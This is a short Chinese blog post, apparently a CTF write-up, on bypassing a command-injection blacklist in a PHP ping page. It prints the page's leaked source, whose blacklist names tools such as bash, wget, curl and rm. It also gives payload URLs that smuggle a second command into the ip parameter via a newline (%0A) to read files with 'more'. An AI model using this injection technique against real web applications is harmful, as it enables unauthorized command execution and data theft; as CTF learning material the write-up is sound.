醉梦半醒的博客

远程命令注入

字数统计: 248阅读时长: 1 min
2018/07/23 Share

ctf里某群友发的题:http://45.124.115.155:8003/a74a15c5fb626077/**

ls cat 啥的都被过滤了(http://45.124.115.155:8003/a74a15c5fb626077/ping.php?ip=127.0.0.1%0Amore%20ping.php):

PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.086 ms

--- 127.0.0.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.086/0.086/0.086/0.000 ms
::::::::::::::
ping.php
::::::::::::::
 'sbsbbsb',
        ';' => 'sb',
        '|' => 'sb',
        '-'  => 'sb',
        '$'  => 'sb',
        '('  => 'sb',
        ')'  => 'sb',
        '`'  => 'sb',
        '||' => 'sb',
         '<>' => 'sb',
         'bash' => 'sb',
          '>' => 'sb',
          'wget' => 'sb',
           'cat' => '',
             'cd' => 'sb',
             '../' => 'sb',
             '/' => 'sb',
             'rm' => 'sb',
             '>>' => 'sb',
             'echo' => 'sb',
             'curl' => 'sb',
             'dd' => 'sb',

    );

// Remove any of the charactars in the array (blacklist).
$target = str_replace( array_keys( $substitutions ), $substitutions, $target );
// var_dump($target);
// Determine OS and execute the ping command.
if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
        // Windows

$cmd = shell_exec( 'ping  ' . $target );
}
else {
    // *nix
    $cmd = shell_exec( 'ping  -c 1 ' . $target );
}

// Feedback for the end user
echo  "{$cmd}";

 

%0a 代表换行

more读取文件(当初学点运维还是挺有用的)

payload:http://45.124.115.155:8003/a74a15c5fb626077/ping.php?ip=127.0.0.1%0Amore%20flag_is_here.php

CATALOG